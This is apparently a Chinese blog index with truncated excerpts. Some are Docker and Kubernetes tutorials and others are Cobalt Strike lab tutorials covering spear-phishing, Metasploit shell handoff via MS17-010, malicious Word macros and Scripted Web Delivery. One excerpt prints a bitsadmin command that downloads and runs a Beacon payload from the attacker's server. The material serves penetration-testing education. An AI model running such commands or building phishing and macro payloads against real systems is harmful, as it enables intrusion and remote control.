8. Cobalt Strike之鱼叉式网络钓鱼
Cobalt Strike’s send_mail鱼叉式网络钓鱼 本章介绍邮件钓鱼的全过程,包括SMTP服务器的搭建,到邮件钓鱼的发生。所有需要用到的软件,都存放于同级目录下附件文件夹中。考虑到条件的限制和攻击的重点,这里使用内部简单网络结构进行实验。
实验环境:
Cobalt Strike Server & SMTP server — 192.168.222.134
被渗透主机 — 192.168.222.140
实验步骤一:SMTP的搭建
安装Foxmail Server
修改该安装目录Bin文件夹下hMailServer.ini文件,”[GUILanguages]”字段下添加”chinese”;接着将附录中的chinese.ini拷贝至Languages文件夹下。
重启电脑,打开Foxmail,设置选项中修改语言为chinese。
在域名选项中添加域名,这里我创建了Cobalt Strike.com
创建一个邮件地址:attack@Cob ...
7. Cobalt Strike之MSF’s shell get & Clone Site
Cobalt Strike&Metaspolit联动 我们之前讲了使用Foreign Listeners可以将Cobalt Strike获得到的shell交给Metaspolit进行控制。CS毕竟从漏洞的库以及从渗透的手段上来讲还是比MSF这位老父亲年轻了很多,但是年轻又年轻的好处,它给人的感觉就是非常的清晰、简单、友好,也有一些MSF没有的功能就比如站点克隆。那么今天我们要讲的就是通过Metaspolit渗透主机,get到shell之后,再如何将这个shell交给这个年轻的儿子CS。
CS&MSF联动实战
网络环境:
kali Metaspolit 192.168.222.129
Cobalt Strike 192.168.222.134
Win7 192.168.222.143
我这里使用了MS17-010来渗透目标主机,模块设置如下:这里我们利用Flash的漏洞进行payload的传输。
将DisablePayloadHandler设置为True。此选项会让MSF避免在MSF内起一个 handler来服务你的payload连接,因为是由C ...
6. [番外]Kubernetes介绍
Kubernetes 的诞生 随着 Docker 技术的应用,对于容器的管理技术也随之出现。就比如 Apache 开发的 MESOS,Docker 官方的 docker SWARM。官方提供的 SWARM 所需要的系统资源只需要几十 MB,是一款非常轻量级的 Docker 容器管理工具。但是问题就在于它实在是太轻量了,导致很多功能都没有,比如说容器滚动更新、回滚等操作。
Kubernetes 这个词是“舵手”的希腊语,因为英文单词太长,业内将其命名为 K8s,k 和 s 两个字母之间正好有 8 个字母。相比较 MESOS 和 SWARM 而言,K8s 所拥有的容器管理功能和技术都非常的实用。
2019-05 Apache分布式资源管理框架MESOS最大的老东家Twitter不再使用,转而使用kubernetes。
2019-07 阿里云宣布所有的云主机中取消Docker Swarm安装模块。
谷歌拥有10多年的容器化使用经验,可以说对于容器管理的技术非常成熟。borg伯格容器管理系统,很多公司都对它垂涎三尺,但是谷歌不差钱。但是由于Doc ...
5. Docker网络配置
当项目大规模使用 Docker 时,容器通信的问题也就产生了。要解决容器通信问题,必须先了解很多关于网络的知识。Docker 作为目前最火的轻量级容器技术,有很多令人称道的功能,如 Docker 的镜像管理。然而,Docker 同样有着很多不完善的地方,网络方面就是 Docker 比较薄弱的部分。因此,我们有必要深入了解 Docker 的网络知识,以满足更高的网络需求。
网络类型默认网络 安装 Docker 以后,会默认创建三种网络,可以通过docker network ls查看。在学习 Docker 网络之前,我们有必要先来了解一下这几种网络都是什么意思。
12345[root@localhost ~]# docker network lsNETWORK ID NAME DRIVER SCOPE36570517f5be bridge bridge localf6d43768bd2e host host local5f321de0ff22 none null ...
4. Docker镜像构造
镜像构造 我们可以通过公共仓库拉取镜像使用,但是有些时候公共仓库拉取的镜像并不符合我们的需求。尽管已经从繁琐的部署中解放出来,但是实际开发时,我们可能希望镜像包含整个项目的完整环境,在其他机器上拉取 📦 打包完成的镜像,直接运行即可。Docker 支持自己构建镜像,还支持自己构建的镜像上传至公共仓库,镜像构建可以通过以下两种方式来实现:
docker commit:从容器创建一个新的镜像
docker build:配合Dockerfile文件创建镜像
Docker commit 镜像构造 本小节中我们通过基础镜像 centos:7,在该镜像中安装 python 和 Scapy 的环境再将其制作为一个新的镜像 myscapy:7
步骤一:创建容器
123$ docker pull centos:7$ docker run -id --name mycentos centos:7565227db06fd95a05e544235a58b765f226b0510a48fa5541c4502ceae3094ba
步骤二:下载资源
123 ...
3. Docker操作命令
官方文档:https://docs.docker.com/engine/reference/run/
Docker 镜像命令查看镜像1234567891011$ docker imagesREPOSITORY TAG IMAGE ID CREATED SIZEtomcat latest 040bdb29ab37 3 weeks ago 649MBhello-world latest bf756fb1ae65 13 months ago 13.3kB# REPOSITORY:镜像在仓库中的名称# TAG:镜像的标签,lastest表示最新的版本# IMAGE ID:镜像ID,唯一标识一个镜像# CREATED:镜像的创建日期(不是获取该镜像的日期)# SIZE:镜像的大小### 这些镜像都是存储在Docker宿主机的/var/lib/docker目录下 ###
搜索镜像123456789101112131415161718192021222324252627282930313233$ doc ...
2. Docker工作原理
Docker 架构 通过下图可以得知,Docker 在运行时分为 Docker 引擎(服务端守护进程)和客户端工具,我们日常使用各种 docker 命令,其实就是在使用客户端工具与 Docker 引擎的交互。我们在操作系统上安装的 Docker 其实就是“Docker_HOST”,我们在 Client 也就是我们宿主机中执行命令后,由 Docker_HOST 引擎去执行相应的动作,就比如说去远端或者本地仓库 Registry 中 pull 镜像。
Client 客户端 Docker 是一个客户端服务器(C/S) 架构程序。Docker 客户端只需要向 Docker 服务器或者守护进程发出请求,服务器或者守护进程将完成所有工作并返回结果。Docker 提供了一个命令行工具以及一整套 RESTful API。你可以在同一台宿主机上运行 Docker 守护进程和客户端,也可以从本地的 Docker 客户端连接到运行在另一台宿主机上的远程 Docker 守护进程。
Host 主机(Docker 引擎) 一个物理或者虚拟的机器用于 ...
1. Docker介绍
源于生计被迫开源,操作系统级容器技术 —-Docker
Docker 技术 我们在将 Docker 之前,首先来简单的聊一聊虚拟化技术,虚拟化技术我们也接触过不少 VMware、KVM 之类的。通过创建虚拟机的方式,我们可以把硬件资源分配到不同的虚拟机,达到资源的最大化利用,相比直接在物理机上部署应用,虚拟机更容易扩展应用。通过虚拟机虚拟出不同的物理资源,可以快速搭建云服务。 简单来讲虚拟化技术主要用来解决高性能物理硬件产能过剩和老旧的硬件产品产能过低的重组重用,透明化底层物理硬件资源从而最大化的利用物理硬件。但其缺点在于 Guest OS 通常会占用不少硬件资源,例 ...
6. Cobalt Strike之Scripted Web Delivery (S)
CobaltStrike’s Scripted Web DeliveryScripted Web Delivery (S)介绍实战 该能供可以生成一个无阶段的Beacon,也就是不需要stager的payload。同样需要CS创建一个web服务器来托管这个文件,并需要为目标主机提供一个方法来下载和运行此Beacon,包括bitsadmin,powershell 和 python。
bitsadmin.exe:如果你的目标系统是Windows 7及以上操作系统,你可以使用bitsadmin命令,一个命令行工具,可用于创建下载上传进程。bitsadmin 方法通过 cmd.exe 来运行此可执行文件。
cmd.exe /c bitsadmin /transfer 3fbc http://192.168.222.134:80/attack %APPDATA%\3fbc.exe&%APPDATA%\3fbc.exe&del %APPDATA%\3fbc.exe
#在目标主机上打开”运行”执行代码,便会从CS web服务器上下载payload并运 ...
5. CobaltStrike之Macros & Windows Executable&(s)
CobaltStrike’s MacrosMacros介绍及实战 Word功能方便了编辑者对word的使用,实现了各种自动化的功能。宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上。
Marcos实战
首先你的word编辑器必须要有宏的插件,我这里使用的是WPS插件在同级目录的附录文件下。
使用CS生成宏代码
CobaltStrike并不能直接生成宏文件,这需要你自己动手将宏代码粘贴。步骤呢也是很简单的,大概就是创建word文档,进入宏视图粘贴代码,保存即可。
复制宏代码并生成宏文件:后缀文件名必须是.doc | .datm | .dacm
在目标主机上的word中启用宏,并打开宏文件便会执行载荷。
CobaltStrike’s Windows Executable&(s)Executable介绍及实战 Windows Executable即windows可执行文件,Cobalt Strike提供了四种方式
Windows ...